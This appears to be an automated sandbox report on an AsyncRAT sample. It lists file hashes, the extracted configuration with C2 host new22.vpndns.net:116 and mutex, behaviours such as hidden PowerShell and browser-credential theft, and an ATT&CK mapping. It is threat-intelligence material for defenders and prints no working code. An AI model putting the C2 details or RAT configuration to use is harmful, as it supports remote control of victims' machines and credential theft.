Overview

overview

10

Static

static

1

Files.7z

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Files.7z

  • Size

    176KB

  • Sample

    240605-qhxcsagd6s

  • MD5

    c03d1ca217a28c7d6ee5f6828bec9375

  • SHA1

    e8ef1d3c41033c98c11df4757868fd3d1fc283fe

  • SHA256

    54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d

  • SHA512

    ce9ac7b28855b44c365229f02814551b905360edef15d3641cf0c620c6559582ef98de356152de5691054eb2c455f08e94d44e3e1245e21304b325447f326971

  • SSDEEP

    3072:Nb+fzE3mwp4kSaBAEby28sLrKdenwWNBZ0gA3G4vg2Oa2iJ0:NaQ3msDy28sLede3CRvwa2iJ0

Score
10/10
asyncratrfuexecutionratspywarestealer

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

RFU

C2

new22.vpndns.net:116

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Targets

    • Target

      Files.7z

    • Size

      176KB

    • MD5

      c03d1ca217a28c7d6ee5f6828bec9375

    • SHA1

      e8ef1d3c41033c98c11df4757868fd3d1fc283fe

    • SHA256

      54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d

    • SHA512

      ce9ac7b28855b44c365229f02814551b905360edef15d3641cf0c620c6559582ef98de356152de5691054eb2c455f08e94d44e3e1245e21304b325447f326971

    • SSDEEP

      3072:Nb+fzE3mwp4kSaBAEby28sLrKdenwWNBZ0gA3G4vg2Oa2iJ0:NaQ3msDy28sLede3CRvwa2iJ0

    Score
    10/10
    asyncratrfuexecutionratspywarestealer

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers written in C#.

      ratasyncrat

    • Async RAT payload

      rat

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer
    behavioral1

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks